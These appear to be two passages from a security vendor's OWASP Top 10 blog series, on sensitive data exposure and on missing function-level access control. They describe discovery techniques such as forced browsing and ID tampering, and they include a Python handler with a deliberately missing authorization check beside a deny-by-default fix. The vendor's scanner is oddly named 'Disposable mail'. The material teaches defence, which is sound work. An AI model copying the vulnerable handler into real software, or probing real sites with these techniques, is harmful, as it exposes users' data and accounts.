As the finding only applies to sensitive data, the potential impact is always considered high. What the data consists of varies and so does the impact. The danger lies in the data being exposed, and the potential impact reflects the data’s sensitivity.

For example, if credit card data is stolen, the attacker can empty the victim’s bank account. If passwords are exposed, the attacker can abuse these credentials. If certificates are stolen, the attacker can pretend to be the target. It all depends on what kind of data is at risk of being exposed.

Exploitability

Most crypto-related vulnerabilities are considered hard to exploit, especially on a larger scale. With that said, some of the vulnerabilities that fall into this category are really easy to “exploit”. If an attacker were to get hold of a database that had been left unencrypted, they would not need to do anything special at all to access sensitive data. With a layer of protection removed from the attack process, exploiting the vulnerability can be considered easy.

In general, with the exception of strictly crypto-focused ones, the vulnerabilities within this category are likely to get exploited.

Well-known events

100 million passwords in plain text from VK.com have recently been leaked. That means that the attacker could, after getting access to the database, log in as any user of choice. It also means that if a user had used the same password on VK.com as on another site, anyone (as the leak is public) would be able to use these credentials to log on to that service and cause great harm.

Another example of a different vulnerability within the same category is tokens exposed in public source code. Many companies have mistakenly exposed private sensitive tokens on Github, which we have written about before. By searching publicly available code, an attacker could get full access to internal communication.

How to discover

This is not a vulnerability that you can look for in the same sense as other more traditional vulnerabilities. Most vulnerabilities within this category cannot be scanned for due to two main reasons:

  • To determine risk, it must be decided what information is considered sensitive, which can be a hard task to carry out automatically.
  • An external pentester cannot know whether internal data is encrypted or not as that is not exposed.

To assess whether you are vulnerable to Sensitive Data Exposure, read the steps under Prevention and establish if any of the steps have not yet been taken. In most cases, this is the only way to identify this vulnerability type.

However, some of the findings can be automatically scanned for, such as lack of sufficient headers to prevent caching behind pages that require authentication or lack of HTTPS on logins.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Example of vulnerable application

As the finding includes every case where sensitive data is exposed or insufficiently protected, the examples are many. To get an idea, here are a few of the most common ones:

  • Data stored in plain text, such as passwords or credit card data (see the first well-known event)
  • Lack of HTTPS on authenticated pages
  • Passwords hashed without a salt, making them easy to crack
  • Tokens disclosed in public source code (see the second well-known event)

Prevention

The first step is to figure out what data can be considered sensitive and therefore important to protect.

When that is done, go over each of these data points and make sure that:

  • The data is never stored in clear text.
  • The data is never transmitted in clear text, for example between the database and the server, or over the internet.
  • The algorithms used to encrypt the data are considered strong enough.
  • The generation of the keys is secure.
  • Browser headers are set to not cache when the sensitive data is presented to end-user.

There are more things to look for when securing data, but what matters most is understanding what data is considered sensitive, and making sure it is treated as such in every instance.

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure


OWASP TOP 10: Missing Function Level Access Control – 10 minute mail

Missing Function Level Access Control is one of the vulnerabilities on OWASP’s Top 10 list and occurs when authentication checks in request handlers are insufficient. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. OWASP Top 10 2017 was released in November 2017, bringing some changes to the list from 2013. We are working on updating our content, but in the meantime, please take a look at our article about OWASP Top 10 2017.

Description

If the authentication check in sensitive request handlers is insufficient or non-existent the vulnerability can be categorised as Missing Function Level Access Control.

An example of this would be an unauthorised user being able to access a URL that contains any sensitive information or exposes functionality intended only for authorized users. Another example of a common type of this vulnerability would be to simply hide a feature from the user, but allowing the request if the user is able to figure out how to conduct it. An example of the latter can be found under the title Code Example in this article.

In some ways this category of vulnerabilities is very similar to IDOR that we have previously written about. To simplify, it can be said that the difference is that IDOR exposes information by going to a URL that an ordinary user should not know about, while this category involves vulnerabilities that expose functionality rather than information. Missing Function Level Access Control vulnerabilities can also require more from the attacker than enumerating a URL.

Prevalence

When OWASP devised their list of the most important vulnerabilities in 2010, this vulnerability was listed as uncommon. Three years later, in 2013, the status had changed to common and it had at the same time jumped up a step on the OWASP Top 10 list.

From our experience we can tell that this is a vulnerability that affects websites and companies of all sizes. However, bigger ones seem to be more seriously affected due to the complexity of their systems.

Potential impact of Missing Function Level Access Control

As with many of the vulnerabilities covered in this series, the potential impact of Missing Function Level Access Control depends greatly on what kind of information or features the attacker can gain access to. It can be anything from seemingly useless information to a full system takeover. When this vulnerability is discussed, it is usually with an impact somewhere in between.

To make the impact concrete: it is often possible to execute actions in the name of other regular users without touching anything related to admins.

Exploitability

Detecting and taking advantage of this vulnerability is considered easy. Often, all it takes is for the attacker to attempt a specific action that should require authentication and if the request succeeds, the page is considered vulnerable. What is hard to do here is to figure out every page that is at risk or feature that could potentially lead to anything dangerous.

As with every other vulnerability, there are instances where Missing Function Level Access Control is really hard to exploit and sometimes it is just part of a chain attack that requires a great amount of creativity, but such cases are exceptions rather than the rule.

Well-known events

There are many interesting cases, but to use one as an example we can take this Hackerone report on a Twitter vulnerability.

By intercepting the request sent to delete his own credit card, the user was able to change the ID of the credit card that was going to be deleted, and by doing so delete an account that was not his. This could have resulted in a halted campaign and, consequently, a considerable business advantage.

Please see the report above for more details as we only cover it as proof that these vulnerabilities do exist in the wild.

How to discover

One way to discover Missing Function Level Access Control is to browse the website while logged in and log all pages visited. The next step is to log out and then revisit all pages. If you get the same result, it is likely that this vulnerability exists. Some proxies made for security testing support this type of analysis by default.

Another way is to simply brute-force different paths, for example /admin, /settings or similar paths that only an admin should be allowed to visit. If any user can access these, it is considered a vulnerability. This is also called forced browsing, which, simplified, means enumerating and accessing resources that are not referenced by the application but are still accessible.

Yet another way is to identify user IDs and similar data in requests and simply change them to someone else's. Chances are that information about another user can be retrieved that way, or even that actions can be executed in their name. That would be similar to the Twitter vulnerability mentioned above under Well-known events.

If you carry out a code analysis, the pattern where a privileged request is processed can be identified, making it easier to understand how the authorization pattern works. This way, it is possible to discover places where the same process is not applied, but the request is still considered sensitive.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Code example of vulnerable application

A simple mockup application has been created to better explain one of the many ways this vulnerability may occur.

Dashboard.php

[The HTML form listing for this file did not survive; only the label "Order ID:" remains.]

This page presents a form where the user enters an order ID and then chooses an action, the alternatives being Cancel and Status. If a logged-in admin visits the page, the alternative Return is available as well. The request is then sent to action.php.

Action.php

This page takes the order ID and the chosen action and then executes the action on the order. It does not employ any authentication or check that the user is an admin, on the assumption that dashboard.php has already done so.

The problem here is that if the attacker can figure out that the alternative Return exists but is hidden for non-admins, a request to action.php can still be sent, returning the payment. The impact in this case would be that the attacker could order free goods from the web shop we set up as an example, as the payment could be refunded after each purchase.

Remediation

The default should always be denial. Everyone should be denied access to everything, and then every specific role can be explicitly granted access for each function. It is also recommended to log all failed attempts as that can help discover if something is incorrectly configured.

Blocking all file types that should not be served anyway is a great way to prevent an attacker from accessing any forgotten configuration files, databases or log files that were mistakenly exposed to the internet without authorisation. Enforcing such blocking may not always be possible, but it is good to at least consider it.

Do NOT, under any circumstances, assume that users are unaware of special or hidden URLs or APIs. That is a misconception we see far too often, and as our code example clearly shows, hiding a feature is not enough. Relying on it is called security through obscurity, and we strongly discourage it.
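The action.php handler from the code example above and its deny-by-default remediation, written in Python rather than PHP as an added example that is not the article's own mockup. The order store, role names, permission table and the logging of refused requests are constructed for this example; the hardened handler also applies the ownership check from the IDOR article earlier in the series.

```python
import logging
from enum import Enum

log = logging.getLogger("authz")


class Role(Enum):
    CUSTOMER = "customer"
    ADMIN = "admin"


# Constructed order store standing in for the shop's database.
ORDERS = {
    42: {"owner": "alice", "state": "paid"},
    43: {"owner": "bob", "state": "paid"},
}

# Explicit allow-list: any (role, action) pair not listed here is denied.
PERMISSIONS = {
    Role.CUSTOMER: {"cancel", "status"},
    Role.ADMIN: {"cancel", "status", "return"},
}


def action_vulnerable(user: str, action: str, order_id: int) -> str:
    """Behaves like action.php in the article: it trusts that Dashboard.php
    only showed 'Return' to admins, so it performs whatever action it is sent."""
    return _perform(action, order_id)


def action_checked(user: str, role: Role, action: str, order_id: int) -> str:
    """Remediated handler: deny by default, allow per role, log every refusal."""
    if action not in PERMISSIONS.get(role, set()):
        log.warning("denied user=%s role=%s action=%s order=%s", user, role.value, action, order_id)
        raise PermissionError(f"{role.value} may not {action} orders")
    order = ORDERS.get(order_id)
    # Customers may only act on their own orders; admins may act on any order.
    if role is Role.CUSTOMER and (order is None or order["owner"] != user):
        log.warning("denied user=%s action=%s order=%s not owned", user, action, order_id)
        raise PermissionError(f"{user} may not act on order {order_id}")
    return _perform(action, order_id)


def _perform(action: str, order_id: int) -> str:
    """Apply the action to the order and return its resulting state."""
    order = ORDERS.get(order_id)
    if order is None:
        raise LookupError(f"no order {order_id}")
    if action == "return":
        order["state"] = "refunded"
    elif action == "cancel":
        order["state"] = "cancelled"
    elif action != "status":
        raise ValueError(f"unknown action {action!r}")
    return order["state"]
```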

Missing Function Level Access Control Proof of Concept video:

Read more

OWASP
Missing Function Level Access Control
Failure to Restrict URL Access
Forced browsing
